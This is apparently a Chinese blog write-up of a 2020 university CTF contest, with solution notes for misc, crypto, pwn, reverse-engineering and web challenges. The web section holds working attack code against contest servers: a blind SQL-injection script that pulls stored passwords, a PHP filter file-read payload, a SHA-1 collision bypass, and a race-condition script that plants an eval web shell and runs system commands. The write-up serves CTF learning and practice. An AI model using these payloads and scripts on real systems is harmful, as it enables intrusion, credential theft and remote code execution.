Cumt2020九月校赛 by 水一水

最新推荐文章于 2022-03-21 18:29:53 发布
最新推荐文章于 2022-03-21 18:29:53 发布
阅读量610 收藏
点赞数
分类专栏: CTF 文章标签: python java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meteox/article/details/119523392
版权

以前的wp,重新上传下 !__!

MSIC

连签到都算不上

题目给出一个压缩包,看到里面txt,猜是base64加密后图片,解码后得到一个二维码,然后扫码得到\u开头的字符串,用java输出得到字符串,再用核心价值观解码,得到flag。

真·签到题

题目给了一个压缩包,猜测是伪加密。考虑到伪加密在kali,mac等系统中可直接打开。于是将压缩包拖到虚拟机中解压。

img

得到一个图片,将它放到winhex中分析发现最后有一串base64加密的字符串。

img

Base64解密得到:EWOVEVH{U1ip_kp_uweeguuhw11a!}

对比CUMTCTF{,,,}格式可以发现,将该字符串字母左移两位即可得到flag。

img

兔兔那么可爱

题目给了一张图片和一个不知道什么格式的flag文件,根据hint,图片没什么用,将flag文件用txt打开,发现第12358个字符组成CUMTCT,猜测是斐波那契数列,于是写python脚本将对应位置的字符打印出来得到flag。

img

别做题了听歌吧

题目给了一个MP3文件,应该是音频隐写,用工具MP3Stego,根据题目的提示“别问,问就是cumt”,猜测cumt是密码,于是解密得到

img

这样一个txt,打开发现是一堆长短不一的空白格,将其转换成Morse编码,有

img

解码得到M0RS38MORSE8M0RS38MORSE8M0RSE8AND8MP3ST39O

加上格式CUMTCTF{M0RS38MORSE8M0RS38MORSE8M0RSE8AND8MP3ST39O}即为flag

CRYPTO

幼儿园的密码题

题目直接给出e,c,n

img

解出p,q

img

然后得到flag。

小学生的密码题

阅读Python代码,显然最后编码后的结果以0为分界线,由于print去除了最后末尾的0,补全后,编码结果应该为:

```

21088410841088402108840420888888821088810888884210888888410888421088881088888820888841088842108820888881088884210888880888888408888888410

```

如果逆向出发未免太烦了,考虑到对于每个字符的编码函数为:

    res = ""

​    if i >= 8:

​      res += int(i/8)*"8"

​     if i%8 >=4:

​      res += int(i%8/4)*"4"

​    if i%4 >=2:

​      res += int(i%4/2)*"2"

​    if i%2 >= 1:

​      res += int(i%2/1)*"1"

将其处理成函数,将0-127的字符全部进行编码,形成哈希映射。

对编码后的结果以0为分隔符分割,得到list,而后迭代获取对应则得到了flag。

PWN

test_nc

直接用nc连接上题目给的端口,肯定自己是个女生,然后得到学长base64加密的联系方式和密码,解密后,加上学长,然后就可以得到flag了。

Babystack

将题目文件拖进IDA然后简单分析,得到只要回答1_love_y0u就可以拿到shell,cat flag就行了

img

RE

re1-连个签到的分都不给你

直接拖进IDA用shift+f12查看字符串得到flag

img

re2-兄弟们快来帮帮萄萄

根据题目提示,下载相应的upx版本,对题目文件进行脱壳,拖进IDA然后同第一题,直接shift+f12查看字符串得到flag

re3-python题禁止py

根据题目python字节码反向写出python代码

img

Web

Web签到

按照题目要求,构造GET 1和POST 2的语句

img

然后题目给出源码

直接加上file=flag.php

发现flag

img

Babysqli

通过测试,发现空格和and会被检测,空格用/**/代替

通过union select挨个测试,发现长度为8,而且4有回显,

在4的位置直接用构造sql语句

img

得到flag:CUMTCTF{27ec8034-c9fe-0cfd-d92a-84362ecf0e42}

Secret

打开发现是个图片,保存下来,用winhex打开,发现里面有php代码,保存下来(也能直接扫到www.zip,)

<!DOCTYPE html>
<html ><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>Secret?</title>
        <h1>The dream of a great singer</h1>
<img src="./secret.jpg"  alt="The dream of a great singer" />
</html>
<?php
error_reporting(0);
include_once('flag.php');
if(isset($_GET['param1']))
{
    $str1=$_GET['param1'];
    if(file_get_contents($str1)!=='Suvin_wants_a_girlfriend')
        die("Suvin doesn't like you");
    if(isset($_GET['param2'])){
        $str2=$_GET['param2'];
        if(!is_numeric($str2))
            die('Suvin prefers strings of Numbers');
        else if($str2<3600*24*30)
            die('Suvin says the num is too short');
        else if($str2>3600*24*31)
            die('Suvin says the num is too long');
        else {
            echo "Suvin says he's falling in love with you!"."</br>";
            sleep(intval($str2)); 
        }
        if (isset($_POST['param1']) && isset($_POST['param2'])) {
            $str1=$_POST['param1'];
            $str2=$_POST['param2'];
            if(strlen($str1)>1000)
                die("It's too long");
            if(((string)$str1!==(string)$str2)&&(sha1($str1)===sha1($str2)))
                echo $flag;
            else 
                die("It's so similar to md5");
        }
    }
}
?>

用burpsuite抓包

利用data:协议绕过第一个die,利用16进制把2,592,001转变成0x278d01绕过第二个die,

最后一个绕过sha1,由于string转换了下,所以不能用数组绕过,直接找sha1碰撞,谷歌放出了第一例sha1碰撞

分析

payload:

http://202.119.201.197:13005/?param1=data:text/plain,Suvin_wants_a_girlfriend&param2=0x278d01


POST:
param1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&param2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

Babysqli2

本题中对单引号进行了禁用,利用转义使用后面password的单引号进行闭合,

空格使用/**/替代,使用or,left,right,ord避开ascii和substr函数的禁用

img

构建python脚本

import requests

s = requests.Session()
url = 'http://202.119.201.197:13004/index.php'
flag = ''

def exp(i, j, z):
    payload = f"or/**/ord(right(left((select/**/password/**/from/**/users/**/limit/**/9,1),{i}),1))={j}#"
    #ord(right(left(database(),1),1))>0#
    #select username from security.users limit 0,1
    data = {
        "username": "1\\",
        "password": payload
    }
    r = s.post(url, data=data)
    if "Login success!" in r.text:
        return True
    else:
        return False

for z in range(0,8):
    flag = ''
    for x in range(1, 80):
        low = 0#32
        high = 127#127

        for i in range(low, high):
            if exp(x, i, z):
                flag += chr(i)
                print(flag)

                break
    print()

print(flag)

最终得到flag

img

简单的文件包含?

image-20200925201023539

使用client-ip构造127.0.0.1绕过

拿到源码:

<?php
if ($_SERVER['HTTP_CLIENT_IP'] != '127.0.0.1' && $_SERVER['HTTP_X_REAL_IP'] != '127.0.0.1'){
        if ($_SERVER['HTTP_X_FORWARDED_FOR'] == "127.0.0.1") {
            die("Do u think that I dont know X-Forwarded-For?<br>Too young too simple sometimes naive");
        }
        die("Sorry, this site is only optimized for those who comes from localhost");
    }
show_source(__FILE__);
include_once("flag.php");
if(isset($_POST['f'])) 
  include_once($_POST['f']);

简单的文件包含,但是之前已经包含了flag.php,include_once只能包含一次,所以要饶过他

分析链接

image-20200925201523855

payload:

http://202.119.201.197:13002/
POST:
f=php://filter/read=convert.base64-encode/resource=/x/../proc/self/cwd/flag.php

base64解码即可

Try:GET_file

包含session

参考:https://www.freebuf.com/vuls/202819.html

如果session.auto_start=On ,则PHP在接收请求的时候会自动初始化Session,不再需要执行session_start()。但默认情况下,这个选项都是关闭的。

但session还有一个默认选项,session.use_strict_mode默认值为0。此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=TGAO,PHP将会在服务器上创建一个文件:/tmp/sess_TGAO”。即使此时用户没有初始化Session,PHP也会自动初始化Session。 并产生一个键值,这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。

利用条件竞争进行rce

#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd":"system('cat /tmp/7IDUrqGOt8PMATm852/flag.txt');"}
#data = {"cmd":"system('find / -name flag*');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://202.119.201.197:13077/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post('http://202.119.201.197:13077/?file=/tmp/sess_'+sessid,data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()
meteox
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CUMT第一轮双月赛Web题解
0verWatch的博客
12-17 926
ez-upload 这个题目作为Web题的第一个题难度刚好,很基础的漏洞点,就考了个文件上传,上来直接用phtml就可以绕过,但是给出来的hint是.htaccess,可能是我非预期了? 菜刀链接获取flag Cve 参考了这篇文章:https://www.menzel3.fun/2018/08/02/Drupal%20CVE2018-7600/#代码执行现场 这是一个Drupal 7的cve...
网络安全作业-by cumt梅苑杀手.docx
08-08
网络安全作业——cumt梅苑杀手.docx文档涵盖了多个网络安全领域的重要概念,主要集中在SQL注入(SQLi)、XML External Entity(XXE)攻击、Cross-Site Scripting(XSS)漏洞和上传漏洞的解决与防范。这些是网络攻防...
Nginx做代理时X-Forwarded-For信息头的处理
weixin_30443813的博客
10-27 880
如今利用nginx做负载均衡的实例已经很多了,针对不同的应用场合,还有很多需要注意的地方,本文要说的就是在通过CDN 后到达nginx做负载均衡时请求头中的X-Forwarded-For项到底发生了什么变化。下图为简单的web架构图: 先来看一下X-Forwarded-For的定义:X-Forwarded-For:简称XFF头,它代表客户端,也就是HTT...
反序列化漏洞详解
qq_48904485的博客
03-21 2957
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
CTF-web Xman-2018 第一天 入营msic
iamsongyu的博客
12-01 2503
广度大,深度不怎么深,涉及的方面有各种加密,流量分析,隐写,文件恢复等 这种类型的题目主要是在于手中的工具要全,很多时候都是依靠工具来完成的,一部分是自己如何找到题目的要点,使用对的工具 考的东西:         细心50         套路40         发散10 Recent Misc Challenge         主流方向,考察点一张大图,网上应该有。     ...
ctfshow 第二届月饼杯 misc部分writeup
ashMOB的博客
11-12 3024
ctfshow 第二届月饼杯 misc部分writeup 说是部分其实就一道 月饼起义 下载得到一个损坏的zip 利用binwalk或者bandizip自带的修复都能得到一个hint.txt,解压后猜测是零宽隐写,去 Unicode Steganography with Zero-Width Characters (330k.github.io) 这解密能得到一个hint提示170 猜测原来的zip文件中还有文件,接着猜是应该要对该zip的16进制进行异或计算(经验与积累,不过我是看wp才知道的) 这一步
matlab将图片旋转的代码_FPGA大赛【八】具体模块设计图像旋转方案
weixin_39978282的博客
11-20 432
【注】该项目是我们团队参加2019届全国大学生FPGA大赛的作品,系统主要实现视频任意角度旋转。该项目最终晋级决赛,并获得紫光同创企业特别奖。该系列文章介绍我们团队的作品。关注公众号“数字积木”对话框回复 FPGA2019 ,即可获得该项目的工程源代码,详细的文档说明,MATLAB仿真代码。4.6图像旋转方案4.6.1总体方案标准模式下,从摄像头获取到图像数据,将该图像数据缓存到DDR中...
CUMT校赛一道php代码审计(绕过)
flying_bird2019的博客
03-30 671
EZ PHP <?php highlight_file(__FILE__); error_reporting(0); if (isset($_GET['tag'])){ $tag=$_GET['tag']; if ($tag==md5($tag)) echo "6啊继续.</br>"; else die("爬爬爬"); }else{ die(" "); } if (isset($_GET['num'])){ $
CUMT-Linux作业by梅苑.docx
03-10
CUMT-Linux作业by梅苑.docx
cumt.rar_cumt_opnet_拓扑图
09-23
《OPNET技术详解:基于cumt.rar_cumt_opnet_拓扑图的深入学习》 在信息技术领域,网络性能分析和模拟是至关重要的环节。OPNET(Optimized Network Engineering Tool)是一款强大的网络仿真与性能分析工具,广泛应用...
CUMT2021算法导论OJ(python版).rar
11-16
《CUMT2021算法导论OJ(python版).rar》是一个压缩包,包含的资源主要用于学习和实践算法,特别强调了Python语言的应用。这个资源可能出自中国矿业大学(CUMT)的一门课程,旨在帮助学生掌握算法基础,并通过在线判题...
基于 Python 实现的CUMT密码学课程设计源代码
最新发布
06-13
【作品名称】:基于 Python 实现的CUMT密码学课程设计源代码 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:基于 ...
Buuoj刷题记录
meteox的博客
08-09 4511
--- title: Buuoj刷题记录 date: 2020-07-20 11:07:42 tags: 题解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的题 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
2021湖湘杯wp_web
meteox的博客
11-15 4182
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
2021l3hctfwp_web
meteox的博客
11-15 3308
Image Service 1 给了源码但没完全给,服务是用gin写的,给的是编译后的文件,运行main后可知 运行app的main的时候由于没数据库报错了 以为下面的包名对应的链接给了源码,然而并不能访问到。。。 给了robot的源码 import requests import time import os os.chdir(os.path.dirname(os.path.abspath(__file__))) username = 'admin' password = os.e
CTF中php相关考点
meteox的博客
08-07 2349
以前在做CTF题的时候总是会遇到一些用php的trick才能过的题,知识点还是很杂的,主要是php这种动态弱类型语言实在是太灵活,各种奇葩写法也多,把之前的知识总结下。 学长的博客有对php黑魔法进行了一些总结,我在此基础上进行拓展 https://skysec.top/2017/07/22/PHP%E5%87%BD%E6%95%B0%E9%BB%91%E9%AD%94%E6%B3%95%E5%B0%8F%E6%80%BB%E7%BB%93/#%E9%BB%91%E9%AD%94%E6%B3%95%E5%A
CTF中的信息泄露
meteox的博客
08-04 2210
服务器之前没咋用,后面的时间应该也没啥时间用了,就没续费了,GitHub page 直接上传图片访问速度又很慢,主题出bug也懒得折腾了,想来还是直接在csdn上写方便很多,也不用重新找图床啥的,之前有很多没写完的笔记,现在有时间也慢慢整理总结下。 一般先用dirmap扫一下,看下有没有信息泄露,CTF中不太建议用御剑的那些字典,很多没用的不必要扫 python3 dirmap.py -i https://target.com -lcf 网站备份文件 在网站的使用过程中,往往需要对网站中的文件进行修改、
2021第五空间CTF_web_wp
meteox的博客
09-20 2209
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.php 在phpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
cumt网络安全实验
11-11
cumt网络安全实验是中国矿业大学(北京)开设的一门实践课程,旨在培养学生对网络安全领域的理论知识和实际操作技能。这门课程内容涵盖了网络攻防技术、安全漏洞挖掘、数据加密与解密、安全协议设计等方面的内容。 在cumt网络安全实验课程中,学生将学习如何进行网络漏洞扫描和渗透测试,以便查找并修补网络系统中的安全漏洞。同时,学生还将学习如何进行数据加密与解密操作,以及安全协议的设计与实施。通过这些实践操作,学生将深入了解网络安全技术的原理和实际应用。 在实验课程中,学生需要运用自己的知识和技能,完成一系列实际项目。比如,学生可能需要设计一个安全的网络系统结构,以保护公司的敏感数据;或者需要协助一家企业进行安全漏洞挖掘,防止黑客攻击。通过这些项目,学生将在实践中不断提升自己的技能和能力,为将来从事网络安全工作做好充分的准备。 通过cumt网络安全实验课程的学习,学生将能够全面掌握网络安全领域的相关知识和技能,为日后就业或深造打下坚实的基础。这门课程将帮助学生更好地理解网络安全领域的重要性和挑战,促进他们对网络安全事业的认识和热爱。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值